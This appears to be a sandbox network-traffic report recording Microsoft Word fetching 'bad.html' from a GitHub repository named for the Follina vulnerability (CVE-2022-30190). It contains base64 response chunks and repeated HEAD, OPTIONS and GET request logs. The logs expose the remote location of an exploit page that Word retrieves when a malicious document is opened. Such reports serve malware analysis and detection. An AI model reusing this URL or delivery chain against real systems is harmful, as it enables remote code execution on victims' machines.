                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC26INData Raw: 67 43 43 72 7a 50 49 4c 61 2b 72 6a 4e 71 37 39 50 6e 5a 72 41 6d 35 63 68 6f 6f 61 43 73 71 77 36 55 55 64 7a 2b 76 4a 7a 38 2f 49 4f 35 2b 54 6b 6c 4a 4b 6b 55 68 57 64 43 44 64 59 4b 50 50 53 52 59 53 53 38 78 79 64 69 52 46 37 52 2b 38 41 43 42 54 6b 4e 43 6d 49 56 6c 67 68 47 46 54 73 76 58 37 64 37 67 36 50 7a 6d 4b 39 74 58 75 46 67 5a 61 39 32 77 48 48 44 6d 33 72 37 72 57 50 70 70 48 49 31 7a 4e 31 50 6d 73 45 64 58 43 70 67 4f 46 49 6a 53 57 76 51 56 48 45 4e 4f 6b 71 67 61 41 7a 52 61 30 75 63 62 6b 43 31 76 71 39 51 33 37 45 4b 4a 47 67 6a 4b 35 2b 31 46 6b 4d 4c 68 43 56 72 4a 6a 52 66 41 6b 6f 70 54 68 77 68 35 31 59 39 68 6a 64 34 63 6e 76 6b 4d 49 31 4f 76 4d 52 46 6c 4f 51 75 6c 35 72 4a 4d 67 4f 67 63 59 42 77 34 34 53 49 2b 4c 67 4a 32
                                                                                                                                                                                                                                        Data Ascii: gCCrzPILa+rjNq79PnZrAm5chooaCsqw6UUdz+vJz8/IO5+TklJKkUhWdCDdYKPPSRYSS8xydiRF7R+8ACBTkNCmIVlghGFTsvX7d7g6PzmK9tXuFgZa92wHHDm3r7rWPppHI1zN1PmsEdXCpgOFIjSWvQVHENOkqgaAzRa0ucbkC1vq9Q37EKJGgjK5+1FkMLhCVrJjRfAkopThwh51Y9hjd4cnvkMI1OvMRFlOQul5rJMgOgcYBw44SI+LgJ2
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC27INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC27INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC27INData Raw: 59 72 49 4e 6d 66 78 51 51 67 6d 53 68 56 4a 56 6c 54 44 75 50 57 71 67 55 43 35 58 73 65 64 50 42 43 36 33 69 68 59 6a 4a 68 4f 57 45 66 68 74 66 67 72 53 62 35 5a 6b 73 72 67 44 78 32 46 6b 75 52 76 76 41 59 65 6b 49 36 4a 4a 6b 31 42 34 4e 4e 46 76 51 34 32 36 6b 49 45 46 69 76 6f 50 7a 38 35 4d 7a 62 31 75 64 38 33 38 63 6e 48 44 6a 39 71 57 6a 33 32 6d 4a 6b 4f 33 39 68 70 53 2f 32 70 69 34 35 45 59 39 6f 50 6f 30 77 2b 71 5a 4e 73 6c 47 71 51 54 34 58 49 73 68 4a 53 46 77 6c 72 33 4a 6f 41 77 75 75 37 72 36 37 6e 65 63 68 36 32 64 4f 51 57 30 43 32 45 61 39 6b 4a 6a 71 59 35 61 6e 63 4c 65 67 6f 39 6b 6d 4f 4e 6f 78 65 73 53 35 46 35 77 52 54 6b 45 56 42 6c 76 32 4a 62 72 45 51 39 46 34 59 48 36 74 72 38 58 64 4f 66 50 4a 54 6b 39 4e 31 61 6a 5a 77
                                                                                                                                                                                                                                        Data Ascii: YrINmfxQQgmShVJVlTDuPWqgUC5XsedPBC63ihYjJhOWEfhtfgrSb5ZksrgDx2FkuRvvAYekI6JJk1B4NNFvQ426kIEFivoPz85Mzb1ud838cnHDj9qWj32mJkO39hpS/2pi45EY9oPo0w+qZNslGqQT4XIshJSFwlr3JoAwuu7r67nech62dOQW0C2Ea9kJjqY5ancLego9kmONoxesS5F5wRTkEVBlv2JbrEQ9F4YH6tr8XdOfPJTk9N1ajZw
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC28INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC28INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC28INData Raw: 52 51 44 77 4e 47 2f 2f 2b 49 2b 49 6d 62 63 6f 4c 35 77 73 6e 34 31 71 30 34 6d 4d 42 4c 31 75 76 56 39 39 4a 78 36 7a 51 57 7a 4b 6e 49 51 42 43 44 33 46 45 79 73 79 69 6d 2f 41 34 6a 2b 4c 6f 56 43 63 2b 4e 6b 34 6a 2f 55 43 34 32 76 33 69 4a 56 31 4a 68 41 52 5a 49 36 54 59 6c 34 74 4b 59 30 47 42 7a 67 58 76 63 6e 62 6b 35 54 5a 47 44 7a 5a 4d 2b 42 73 72 32 39 32 70 70 33 4c 44 73 78 79 47 79 41 74 35 5a 45 71 46 4c 4d 5a 65 63 70 33 52 4c 2b 72 43 53 66 33 36 45 7a 54 42 56 64 38 52 4d 39 65 34 59 4a 32 76 6f 45 6f 61 6b 68 6b 56 6f 55 59 6e 56 55 70 34 35 53 70 54 51 45 68 4a 33 6c 34 2f 4e 37 30 6c 5a 61 76 51 35 69 78 6b 68 66 6a 4f 66 4a 4c 47 7a 69 42 6d 48 51 6f 4c 48 53 35 72 64 32 57 37 50 59 42 41 4e 35 37 36 4a 43 73 6a 49 66 4a 43 38 5a
                                                                                                                                                                                                                                        Data Ascii: RQDwNG//+I+ImbcoL5wsn41q04mMBL1uvV99Jx6zQWzKnIQBCD3FEysyim/A4j+LoVCc+Nk4j/UC42v3iJV1JhARZI6TYl4tKY0GBzgXvcnbk5TZGDzZM+Bsr292pp3LDsxyGyAt5ZEqFLMZecp3RL+rCSf36EzTBVd8RM9e4YJ2voEoakhkVoUYnVUp45SpTQEhJ3l4/N70lZavQ5ixkhfjOfJLGziBmHQoLHS5rd2W7PYBAN576JCsjIfJC8Z
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC30INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC30INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC30INData Raw: 4d 78 64 64 67 55 31 46 33 61 58 56 62 53 79 42 73 52 34 43 59 38 50 61 56 79 53 54 33 66 33 6b 54 31 61 70 70 67 31 4b 34 4a 65 56 6e 6e 67 50 32 6e 6b 4d 63 73 4a 45 37 69 71 32 45 30 48 72 55 79 48 71 6b 52 38 48 67 68 7a 52 78 6e 4b 44 58 6c 39 52 68 48 72 33 74 63 41 79 4d 74 30 65 62 51 6e 65 6d 57 52 54 34 2f 46 77 7a 64 54 2b 33 6a 52 6f 58 70 4d 43 69 4b 47 53 4c 57 65 47 35 77 52 71 63 36 56 4f 5a 75 76 48 67 59 72 63 47 30 75 67 69 50 74 36 51 4d 69 55 64 6b 34 51 30 42 34 77 65 79 73 6c 56 2b 53 6c 33 55 67 34 71 35 63 31 52 50 74 48 6c 6b 45 68 42 5a 7a 44 38 56 2f 5a 67 6e 4d 45 47 75 6e 78 30 54 70 6e 59 33 49 52 58 6a 43 6a 32 69 59 54 72 41 7a 76 65 6a 77 64 39 61 62 74 2f 70 34 65 48 55 67 66 70 61 49 5a 43 7a 77 35 56 31 50 34 64 61 7a
                                                                                                                                                                                                                                        Data Ascii: MxddgU1F3aXVbSyBsR4CY8PaVyST3f3kT1appg1K4JeVnngP2nkMcsJE7iq2E0HrUyHqkR8HghzRxnKDXl9RhHr3tcAyMt0ebQnemWRT4/FwzdT+3jRoXpMCiKGSLWeG5wRqc6VOZuvHgYrcG0ugiPt6QMiUdk4Q0B4weyslV+Sl3Ug4q5c1RPtHlkEhBZzD8V/ZgnMEGunx0TpnY3IRXjCj2iYTrAzvejwd9abt/p4eHUgfpaIZCzw5V1P4daz
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC31INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC31INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC31INData Raw: 4e 31 56 30 34 2f 37 6e 46 47 77 77 52 55 31 63 62 4c 62 71 2b 32 4e 54 62 32 48 47 38 33 53 36 6d 55 4e 4e 6d 73 66 67 53 46 63 72 55 6e 31 32 2b 76 6d 54 39 6a 42 56 35 33 4c 46 6e 72 50 4a 44 4b 44 57 4d 30 49 37 46 72 41 4d 52 69 38 67 6c 52 39 50 6a 78 30 31 48 4d 62 4f 75 48 59 6b 79 45 6c 46 64 73 73 2f 56 33 54 36 4b 36 48 66 30 75 4d 76 6d 38 64 74 36 57 33 70 56 76 7a 64 45 35 73 71 44 4d 34 68 32 2f 42 4e 61 56 52 59 50 73 45 6d 37 74 46 5a 68 64 52 64 43 57 32 31 57 5a 4f 7a 75 74 4f 46 38 4b 67 4c 35 50 76 63 7a 39 38 46 34 4c 33 6f 74 67 46 41 7a 68 45 73 49 52 75 76 4d 6c 30 66 50 73 42 51 6b 48 45 74 4a 70 4b 63 70 36 67 70 5a 76 4e 58 59 34 68 34 4c 58 47 78 30 4a 43 53 46 37 70 31 57 32 4a 69 77 31 31 38 5a 5a 69 59 4b 46 37 65 77 57 31
                                                                                                                                                                                                                                        Data Ascii: N1V04/7nFGwwRU1cbLbq+2NTb2HG83S6mUNNmsfgSFcrUn12+vmT9jBV53LFnrPJDKDWM0I7FrAMRi8glR9Pjx01HMbOuHYkyElFdss/V3T6K6Hf0uMvm8dt6W3pVvzdE5sqDM4h2/BNaVRYPsEm7tFZhdRdCW21WZOzutOF8KgL5Pvcz98F4L3otgFAzhEsIRuvMl0fPsBQkHEtJpKcp6gpZvNXY4h4LXGx0JCSF7p1W2Jiw118ZZiYKF7ewW1
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC32INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC32INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC32INData Raw: 56 47 7a 53 2b 33 54 30 56 4b 6e 53 6c 5a 32 67 59 6a 72 76 52 58 62 58 4f 6f 79 37 35 33 50 73 32 69 78 51 49 50 64 39 2f 31 45 61 4d 66 69 69 46 65 4e 52 4b 49 6d 48 6f 2f 4a 4b 66 36 44 57 48 35 6f 39 4f 74 47 6e 79 35 6d 54 72 49 38 6c 35 58 77 54 52 6a 36 49 50 79 68 4f 73 75 69 2f 71 7a 41 34 4c 70 78 5a 31 77 6f 68 2b 44 68 56 66 52 71 47 79 49 2b 4d 31 76 38 36 6f 4c 4d 46 66 6c 6f 4b 54 66 64 36 62 42 55 49 5a 4e 32 51 59 73 4c 45 62 4a 65 79 38 4c 56 69 69 6b 62 68 57 48 73 6b 71 5a 48 4d 68 75 71 41 62 39 68 70 45 45 34 6e 68 43 50 6b 4e 62 31 37 7a 43 56 5a 63 36 50 75 38 72 65 31 4b 4d 63 34 6c 4a 4d 6e 79 33 43 30 38 49 73 41 68 48 58 33 2f 76 71 74 55 35 36 38 69 4e 31 77 65 66 46 36 70 31 73 47 4b 72 72 64 79 5a 6e 68 4b 56 61 36 4d 2f 48
                                                                                                                                                                                                                                        Data Ascii: VGzS+3T0VKnSlZ2gYjrvRXbXOoy753Ps2ixQIPd9/1EaMfiiFeNRKImHo/JKf6DWH5o9OtGny5mTrI8l5XwTRj6IPyhOsui/qzA4LpxZ1woh+DhVfRqGyI+M1v86oLMFfloKTfd6bBUIZN2QYsLEbJey8LViikbhWHskqZHMhuqAb9hpEE4nhCPkNb17zCVZc6Pu8re1KMc4lJMny3C08IsAhHX3/vqtU568iN1wefF6p1sGKrrdyZnhKVa6M/H
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC34INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC34INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC34INData Raw: 75 68 39 70 32 76 4e 32 64 71 58 48 36 75 48 37 5a 32 2f 77 70 50 73 54 37 38 36 54 45 41 58 56 6d 73 62 49 48 52 47 78 77 6b 46 44 6e 4e 56 71 73 4d 45 70 73 73 46 67 64 73 66 52 2f 48 4f 50 43 57 45 32 4f 6e 66 30 38 34 55 38 45 46 61 34 61 4d 6c 54 44 31 64 74 30 6f 69 65 2b 55 68 6f 72 2b 78 39 50 54 6d 45 2f 57 55 54 56 49 6c 2f 76 6c 5a 2f 67 70 63 53 70 30 72 45 36 54 46 4f 49 47 43 75 72 47 67 4b 58 4c 68 75 48 6c 50 68 6a 50 48 59 68 49 2f 63 46 78 73 58 67 39 44 68 77 57 4b 41 63 50 4c 37 31 61 4b 70 68 48 34 57 6c 57 71 46 75 68 50 74 69 37 70 56 73 61 75 43 74 64 65 48 57 5a 38 4f 38 37 69 68 4f 6c 66 4b 46 41 64 6b 44 49 6e 62 4f 69 46 46 58 77 33 79 47 58 31 46 51 37 63 36 51 41 30 45 68 74 2b 36 53 31 63 76 53 6a 59 6a 73 69 62 72 38 70 42
                                                                                                                                                                                                                                        Data Ascii: uh9p2vN2dqXH6uH7Z2/wpPsT786TEAXVmsbIHRGxwkFDnNVqsMEpssFgdsfR/HOPCWE2Onf084U8EFa4aMlTD1dt0oie+Uhor+x9PTmE/WUTVIl/vlZ/gpcSp0rE6TFOIGCurGgKXLhuHlPhjPHYhI/cFxsXg9DhwWKAcPL71aKphH4WlWqFuhPti7pVsauCtdeHWZ8O87ihOlfKFAdkDInbOiFFXw3yGX1FQ7c6QA0Eht+6S1cvSjYjsibr8pB
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC35INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC35INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a


Session ID: 1
Source IP: 192.168.2.4
Source Port: 49705
Destination IP: 185.199.108.133
Destination Port: 443
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-08-18 01:57:05 UTC
kBytes transferred: 54
Direction: OUT
Data:
HEAD /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: raw.githubusercontent.com

Timestamp: 2022-08-18 01:57:05 UTC
kBytes transferred: 55
Direction: IN
Data:
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:05 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6939-MXP
                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                        X-Timer: S1660787826.732014,VS0,VE121
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: b9594ed1c6d167616f9ea3a4eaa3aa878f0b48f7
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:05 GMT
                                                                                                                                                                                                                                        Source-Age: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.4 | 49714 | 185.199.109.133 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
2022-08-18 01:57:10 UTC | 96 | OUT | HEAD /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: raw.githubusercontent.com
Connection: Keep-Alive
2022-08-18 01:57:10 UTC | 97 | IN | HTTP/1.1 404 Not Found
Connection: close
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71
Accept-Ranges: bytes
Date: Thu, 18 Aug 2022 01:57:10 GMT
Via: 1.1 varnish
X-Served-By: cache-mxp6941-MXP
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1660787831.680249,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: 9cc769d5c6e06fa7a2b3dd1d9f39dd18e6512588
Expires: Thu, 18 Aug 2022 02:02:10 GMT
Source-Age: 5


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.4 | 49715 | 185.199.109.133 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
2022-08-18 01:57:10 UTC | 97 | OUT | GET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: raw.githubusercontent.com
Connection: Keep-Alive
2022-08-18 01:57:10 UTC | 98 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 8226
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e354a911960708e3440f84ea636df58339a30e9db3fd96e7dc79f2ba014824d1"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 7924:06B9:51884D:55A9F9:62FD9C75
Accept-Ranges: bytes
Date: Thu, 18 Aug 2022 01:57:10 GMT
Via: 1.1 varnish
X-Served-By: cache-mxp6923-MXP
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1660787831.765353,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: 28995a98776a1c9190877e70937313332b41e765
Expires: Thu, 18 Aug 2022 02:02:10 GMT
Source-Age: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.4 | 49716 | 185.199.109.133 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 01:57:12 UTC | 107 | OUT | HEAD /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
                                                                                                                                                                                                                                        Authorization: Bearer
                                                                                                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                                                        User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
2022-08-18 01:57:12 UTC | 107 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 14
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:12 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6942-MXP
                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                                                                        X-Timer: S1660787833.802035,VS0,VE1
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: 171bdafc3cc43db5bb8271a13736edb38baa21b4
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:12 GMT
                                                                                                                                                                                                                                        Source-Age: 7


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49706 | 185.199.108.133 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 01:57:08 UTC | 55 | OUT | OPTIONS /drgreenthumb93/CVE-2022-30190-follina/ HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Authorization: Bearer
                                                                                                                                                                                                                                        User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                                                                        X-Office-Major-Version: 16
                                                                                                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                                                                                                        X-FeatureVersion: 1
                                                                                                                                                                                                                                        X-MSGETWEBURL: t
                                                                                                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
2022-08-18 01:57:08 UTC | 56 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:08 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6942-MXP
                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                        X-Timer: S1660787829.961872,VS0,VE9
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: 1e438572101bdeafcc9fe390762dd85dc0c41b96
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:08 GMT
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding
                                                                                                                                                                                                                                        transfer-encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49707 | 185.199.109.133 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 01:57:09 UTC | 63 | OUT | GET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
2022-08-18 01:57:09 UTC | 63 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 8226
                                                                                                                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        ETag: "e354a911960708e3440f84ea636df58339a30e9db3fd96e7dc79f2ba014824d1"
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:51884D:55A9F9:62FD9C75
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:09 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6964-MXP
                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                        X-Timer: S1660787829.123418,VS0,VE156
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: 9ad2f308e82a21251073574645c4eeecda18469e
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:09 GMT
                                                                                                                                                                                                                                        Source-Age: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49708 | 185.199.109.133 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
2022-08-18 01:57:09 UTC | 72 | OUT | HEAD /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: raw.githubusercontent.com
Connection: Keep-Alive
2022-08-18 01:57:09 UTC | 72 | IN | HTTP/1.1 404 Not Found
Connection: close
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71
Accept-Ranges: bytes
Date: Thu, 18 Aug 2022 01:57:09 GMT
Via: 1.1 varnish
X-Served-By: cache-mxp6955-MXP
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1660787830.535497,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: 4aa7bf1bd86ec554d4344a3b644d235210eff816
Expires: Thu, 18 Aug 2022 02:02:09 GMT
Source-Age: 4


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49709 | 185.199.109.133 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
2022-08-18 01:57:09 UTC | 73 | OUT | HEAD /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: raw.githubusercontent.com
Connection: Keep-Alive
2022-08-18 01:57:09 UTC | 73 | IN | HTTP/1.1 404 Not Found
Connection: close
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71
Accept-Ranges: bytes
Date: Thu, 18 Aug 2022 01:57:09 GMT
Via: 1.1 varnish
X-Served-By: cache-mxp6925-MXP
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1660787830.792096,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: 8f764b5df9319996b8b6c3a33902dda0dd52d219
Expires: Thu, 18 Aug 2022 02:02:09 GMT
Source-Age: 4


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49710 | 185.199.108.133 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
2022-08-18 01:57:09 UTC | 74 | OUT | OPTIONS /drgreenthumb93/CVE-2022-30190-follina/main/ HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
